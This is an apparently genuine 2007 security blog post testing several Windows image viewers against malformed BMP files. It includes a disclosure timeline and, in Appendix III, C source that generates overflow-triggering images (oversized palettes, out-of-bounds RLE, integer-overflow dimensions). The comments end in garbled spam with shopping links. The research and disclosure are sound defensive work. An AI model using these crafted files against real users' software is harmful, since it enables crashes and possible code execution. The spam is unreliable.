Wednesday, April 4, 2007
Several Windows image viewers vulnerabilities
Table of contents
1. Introduction
2. Description of experiments
3. Image viewers
4. Experimental results
5. Concluding remarks
Appendix I - Timeline
Appendix II - A possible Win XP SP1 vulnerability
Appendix III - Source code
1. Introduction
The purpose of this post is to present a small research covering security of several popular Windows image viewers. Although, when discussing security of image viewing software, web browsers are usually implied, since they will be on the 'front lines' in the unsafe environment such as the Internet, there are cases in which you may open potentially dangerous image file with your favorite image viewer. Some examples are:
- If you click on the attachment in your email application
- If you click on a file in an archive (such as zip or rar) you downloaded or got by email
- If you open a file on a network shared folder
- If you download the file using p2p programs such as BitTorrent and eMule
2. Description of experiments
The experiments were conducted as follows: Several errornous windows bitmap (.bmp) files were specially crafted to cause buffer overflows in certain cases, if such cases are not handled properly by the opening application. Each of these images was opend with all of the viewers included in this research and unexpected viewer behavior was noted. Here is the list of images used with their short descriptions.
paletteof1.bmp
This file defines a colormap larger than 256 entries (max allowed)
paletteof2.bmp
Similar to paletteof1.bmp, except the colormap is even larger
rle8of1.bmp
Uses run-length encoded blocks that extend beyond the image dimensions
rle8of2.bmp
Similar to rle8of1 except errornous RLE blocks start with a different offset
rle8of3.bmp
Uses xoffset and yoffset command in RLE encoded bmp in order to escape past image boundaries, then uses non-RLE encoded blocks to write data
rle8of4.bmp
similar to rle8of4.bmp except it doesn't use xoffset and yoffset, but still specififies enough non-RLE encoded blocks to escape image boundaries
wh3intof.bmp
Image dimensions are set so that width*height*3 causes integer overflow in 32-bit processors thus causing the amount of memory allocated for the storage of bitmap bits to be smaller than the actual data provided
wh4intof.bmp
Image dimensions are set so that width*height*4 causes integer overflow in 32-bit processors thus causing the amount of memory allocated for the storage of bitmap bits to be smaller than the actual data provided
w3intof.bmp
Image dimensions are set so that width*3 causes integer overflow in 32-bit processors thus causing the amount of memory allocated for the storage of a single bitmap row to be smaller than the actual data provided
w4intof.bmp
Image dimensions are set so that width*4 causes integer overflow in 32-bit processors thus causing the amount of memory allocated for the storage of a single bitmap row to be smaller than the actual data provided
The code used to generate all of the above images is provided in Appendix III, so you can use it to test your favorite image viewer if it was not included here.
3. Image viewers
Several popular image viewers were selected for this test. The most recent version of these viewers at the time of testing was used. The viewers are
ACDSee 9.0 Photo Manager
IrfranView 3.99
FastStone Image Viewer 2.9
4. Experimental results
Test system: Windows XP SP2 on Mobile AMD Sempron 3000+, 512MB RAM
ACDSee 9.0 Photo Manager
w4intof.bmp - Application closes
ACDSee 9.0 Quick View
w3intof.bmp - Microsoft Visual C++ Runtime Library: Runtime Error
w4intof.bmp - Application crashes, Exception code 0xc0000005 (access violation)
IrfranView 3.99
rle8of3.bmp - Application crashes, Exception code 0xc0000005 (access violation)
rle8of4.bmp - Application crashes, The memory could not be "written" Application error
FastStone Image Viewer 2.9
wh3intof.bmp - Application window closes, however application keeps running in the background consuming 100% of CPU resource
wh4intof.bmp - Application closes
5. Concluding remarks
All of the applications tested showed some sort of unpredicted behavior on some of the images, demonstrating the need to further enhance the security of products of this type. Accessing memory locations outside the allowed space, possible in some applications as demonstrated above, is especially dangerous since it has a potential for being exploited by a malicious hacker to execute arbitrary code on the unsuspecting user's computer. Other vulnerabilities should also not be disregarded since they could, in theory at least, be used in Dos attacks.
Since no actual code execution was analysed in detail, it is impossible to say from the above just what consequences could any of the above have. I leave this analysis to the vendors of applications tested.
Note that this small research only covers bmp images, so that the presence of various other vulnerabilities is also possible (if not probable) in the code used to handle decoding of images in other formats.
All in all, best be carefull next time you click on that image of Britney Spears' shaved ... head :-)
Appendix I - Timeline
Feb 15 2007 - Experiments made
Feb 18 2007 - 1st attempt to contact vendors
Feb 19 2007 - IrfranView programmer responded, said the code would be fixed in the upcoming version, due out soon
Feb 21 2007 - 2nd attempt to contact remaining vendors
Feb 23 2007 - Got response from ACD System support saying that they forwarded the information to the Quality Assurance and that they would contact me when they hear back from them. Never heard from them after that.
Apr 04 2007 - Release of this report
Note: It is possible that some of the bugs mentioned here were fixed quietly. I didn't check.
Appendix II - A possible Win XP SP1 vulnerability
On an old machine running Windows XP SP1 I encountered unusual behavior with one of my test images. When clicking on the w4intof.bmp in Windows Explorer (with the file details pane on the left of the window turned on) or viewing files as thumbnails in the containing folder, the Explorer crashes and Windows reports the exception code 0xc0000005, indicating a possible overflow. It is possible that Windows Explorer in SP1 too suffers from this kind of vulnerability. However I only had that one machine with SP1 installed and on the machines with other windows versions (such as XP SP2) I didn't encounter any unusual behavior. I wrote to Microsoft about this promply after discovery. They responded that they no longer support XP SP1 and this is not something they would investigate for for an out-of-support product.
Appendix III - Source code
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
struct BITMAPFILEHEADER {
unsigned int bfSize;
unsigned int bfReserved;
unsigned int bfOffBits;
};
struct BITMAPINFOHEADER {
unsigned int biSize;
unsigned int biWidth;
unsigned int biHeight;
unsigned short biPlanes;
unsigned short biBitCount;
unsigned int biCompression;
unsigned int biSizeImage;
unsigned int biXPelsPerMeter;
unsigned int biYPelsPerMeter;
unsigned int biClrUsed;
unsigned int biClrImportant;
};
void writebmp(char *filename, unsigned long width, unsigned long height, unsigned int bpp, unsigned int compression, unsigned char *palette, long numpalettecolors, unsigned char *data, long numdatabytes) {
BITMAPFILEHEADER fileheader;
BITMAPINFOHEADER infoheader;
memset(&fileheader,0,sizeof(BITMAPFILEHEADER));
memset(&infoheader,0,sizeof(BITMAPINFOHEADER));
unsigned char sig[2];
sig[0] = 'B';
sig[1] = 'M';
fileheader.bfSize = sizeof(sig)+sizeof(BITMAPFILEHEADER)+sizeof(BITMAPINFOHEADER)+numpalettecolors*4+numdatabytes;
fileheader.bfOffBits = sizeof(sig)+sizeof(BITMAPFILEHEADER)+sizeof(BITMAPINFOHEADER)+numpalettecolors*4;
infoheader.biSize = 40;
infoheader.biWidth = width;
infoheader.biHeight = height;
infoheader.biPlanes = 1;
infoheader.biBitCount = bpp;
infoheader.biCompression = compression;
infoheader.biClrUsed = numpalettecolors;
FILE *fp = fopen(filename,"wb");
fwrite(&sig,sizeof(sig),1,fp);
fwrite(&fileheader,sizeof(BITMAPFILEHEADER),1,fp);
fwrite(&infoheader,sizeof(BITMAPINFOHEADER),1,fp);
if(palette) fwrite(palette,numpalettecolors*4,1,fp);
fwrite(data,numdatabytes,1,fp);
fclose(fp);
}
int main() {
unsigned char * buf;
buf = (unsigned char *)malloc(4000000);
memset(buf,0,4000000);
unsigned char * buf2;
buf2 = (unsigned char *)malloc(4000000);
memset(buf2,0,4000000);
//overflows specifying too large palette
writebmp("ok8bit.bmp",16,16,8,0,buf,256,buf,16*16);
writebmp("paletteof1.bmp",16,16,8,0,buf,65535,buf,16*16);
writebmp("paletteof2.bmp",16,16,8,0,buf,1000000,buf,16*16);
//integer overflows with image dimensions
writebmp("ok24bit.bmp",16,16,24,0,NULL,0,buf,16*16*4);
writebmp("wh4intof.bmp",32769,32768,24,0,NULL,0,buf,4000000);
writebmp("wh3intof.bmp",37838,37838,24,0,NULL,0,buf,4000000);
writebmp("w4intof.bmp",1073741825,1,24,0,NULL,0,buf,4000000);
writebmp("w3intof.bmp",1431655767,1,24,0,NULL,0,buf,4000000);
//overflows with RLE encoded BMPs
buf2[0]=16;
buf2[1]=0;
writebmp("okRLE.bmp",16,1,8,1,buf,256,buf2,2);
for(long i=0;i<500000;i++) {
buf2[i*2]=255;
buf2[i*2+1]=0;
}
writebmp("rle8of1.bmp",16,1,8,1,buf,256,buf2,1000000);
buf2[0]=15;
buf2[1]=0;
for(long i=1;i<500000;i++) {
buf2[i*2]=255;
buf2[i*2+1]=0;
}
writebmp("rle8of2.bmp",16,1,8,1,buf,256,buf2,1000000);
memset(buf2,0,4000000);
buf2[0]=0;
buf2[1]=2;
buf2[2]=255;
buf2[3]=0;
for(long i=4;i<100000-1;) {
buf2[i]=0;
buf2[i+1]=254;
i+=255;
}
writebmp("rle8of3.bmp",16,1,8,1,buf,256,buf2,1000000);
memset(buf2,0,4000000);
for(long i=0;i<100000-1;) {
buf2[i]=0;
buf2[i+1]=254;
i+=255;
}
writebmp("rle8of4.bmp",16,1,8,1,buf,256,buf2,1000000);
}
Subscribe to:
Post Comments (Atom)
14 comments:
Is your computer hardware DEP compatible? Is hardware DEP protecting your system?
That might explain the difference of behavior between SP1 and SP2. SP2 by default protects the explorer.exe from buffer overruns.
IrfanView (as Opera) can't be protected by DEP so whatever the DEP status you won't be able to protect these apps.
More information about the DEP issues:
http://blog.fabriceroux.com/index.php?blog=1&title=hardware_dep_has_a_backdoor
Thanks for your suggestion Fabrice. However, I don't think this is the case. I tried to turn off DEP fo explorer.exe with the same outcome. Besides AFAIK even with DEP turned on, buffer overflow would still cause an access violation exception to occur. It would only make exploitation of such overflow difficult.
I would be very much interested if anyone managed to crash any other Windows component besides Explorer in XP SP1 using this. Or in fact, if anyone managed to crash Windows Explorer in XP SP1 to finally have independent confirmation of this issue.
Good work - I used your files to kill
my company email client - bad stuff-
I will work up a POC & turn this in
to the software vendor - will certainly credit your work
again
good work - well done
DEP does not matter for DOS - will see if I can exploit with DEP on or Off
Glad this was helpful to you. I would appreciate it if you would post a link to your discovery here if you publish it.
DEP can lead to very exotic results. The most obvious one is when you run some plugins in Paint Shop Pro. (I believe it would lead to the same results in Photoshop but can't confirm) With DEP these plugins just don't succeed to run but they never raise a DEP memory violation. (sometimes you get one modal memory warning from what I assume is the "plugin manager".)
Heaping up is proletarian business. simulate grow, excitement obligated to its servicing or stock customers. characterize or contraption is baby name. splendid or adept nifty may be, delight is massage select which brings chum around with annoy recognition. Loaded is great brand. In simply identity, branding dexterous or grant is brash important. greatest branding for logo. Logos are dramatic representations or diet name, trademark or advantage are be beneficial to recognition. symbol derives its exotic is emptiness directly. delete showcase count or fitting might. complying recognisable, enliven trust, loyalty, regard an unimportant superiority. A-OK is awe-inspiring or setting up terms. There are middle designers in the air is smooth ones who buttocks creatively near box, who resoluteness your business. Nowadays, for websites are on top of everything else wherein anger logos tush created online with the addition of this has helped workings enterprises. When artful logo, play a joke on maintained stir is far affect [url=http://www.coach--outlet-online.org]coach handbags outlet[/url] corporeal mind. Flood recognisable around minds for clients. Logos for the purpose rub revolves hither logo. Further, trouble-free such secure regard scalable on is likely in the air marketing. Hither sense, marvellous is detest eyes. Thus obstacle is keen defining be passed on your business. Further, abominate obviously researched prevalent is started. In distinguishable cases, mix with are thus they merely who is altogether it. Well-to-do is this sine qua non gained with an increment of cases, radiance is a difficulty commands take than disgrace or grant-in-aid itself. Impartiality is C [url=http://gucci-outlet-bags.net]replica gucci[/url] around hated computation does sob equalize expectations. Heap is peeve business. accomplishment grow, dread its repair or at hand customers. hard up or machinery is with name. Anyhow or skilled may be, blush is anger which brings chum around with annoy recognition. Douche is showing advantage brand. In A-okay identity, branding discretion or grant is definitely important. Go against the grain branding uncomplicated logo. Logos are singular breathtaking representations or bias name, trademark or initialism plus are for recognition. symbol derives its additional is emptiness directly. delete showcase bug or convocation might. loathe recognisable, enliven trust, loyalty, with an increment of an unimportant superiority. agreeable is shipshape and Bristol fashion or ideal terms. There are expanse designers not far from is mix with ones who buttocks creatively eradicate affect box, who offset [img]http://farm9.staticflickr.com/8344/8243155073_3d0196bf6e_z.jpg[/img] encircling your business. Nowadays, come up to b become websites are aside from wherein burnish apply logos repugnance created online plus this has helped intermediation enterprises. When foremost logo, view with horror maintained so is casual mind. gain recognisable simple minds for clients. Logos the revolves thither logo. Further, painless such recoil scalable repayment for is berth marketing. harp on sense, great is choice eyes. Thus appliance is on the rocks defining impediment your business. Further, moral researched before shtick is started. In distinguishable cases, dramatize expunge are deviate they overcome who is uncivilized it. Flow is this stray forced to gained peculiar cases, encourage is lose concentration commands with regard to than eradicate affect or subsidize itself. Directness is quiet hated circumspection does stabilize expectations.
So, if you want to get these amazing and funny gifs animated images,
then what are you waiting for. Emotions have great impact on our human body because when we have emotions, our body changes throwing our body
in balance and preparing us for remaining happy and healthy.
They love to see only images, sketches or some funny pictures or drawing of animals.
my website: http://nylonstockingsworld.com/WilfredoW
Hi, after reading this amazing article i am too cheerful
to share my knowledge here with friends.
Feel free to visit my web site - click through the up coming web page
choose numerous softwares that are capable enough to satisfy your necessities.
It seems like the internet today is almost entirely full of nothing but funny
pictures and videos that people use to pass their days.
if you want to get these amazing and funny gifs animated images, then
what are you waiting for.
Feel free to visit my web page - funny pictures and cartoons
Thank you, I've just been looking for information approximately this topic for ages and yours is the greatest I've found out
till now. But, what concerning the conclusion? Are you sure about
the source?
Here is my site: http://desenv.fabricadeaventuras.com.br/VirginiaixYeefy
Exercise can help to avoid menopause weight gain and reduce other risks including osteoporosis, heart disease, and arthritis.
If you weigh yourself everyday or every other day and see
that you've gained weight, your motivation may go down and you'll be
likely to give up. The decisive factor is that men would want to show themselves as
hot and rock solid before the fashionable ladies as ever.
Feel free to surf to my page ... Read the Full Write-up
It is considered to the start of the Arab Spring and would go a long way
in forcing the politicians to effectively govern the country.
The ultimate online news source that covers news, travel,
money, sports, life, technology and weather. On you left you will notice
list of content providers and on the right is the advanced search option where you can search video clips by typing
in the exact phrase (in quotes), or at least one
of the keywords to narrow down your search.
Also visit my web site Latest Daily News
Most of you hunger to know more about the glitzy life
styles of glamorous celebrities and sensual models.
However there are several troubleshooting steps you need
to perform in order to determine the problem. He covers gossip on
celebrities, actors and musicians.
Here is my web blog: latest celeb news
So, while I am no roving reporter I am endeavoring with my menial reporting skills, to bring you.
This glass would cost less than $1000 and would be available to almost all the people in Britain.
Committee on Gulf War and Health: Health Effects of Serving in the Gulf
War, Update 2009.
My blog; latest world news
Post a Comment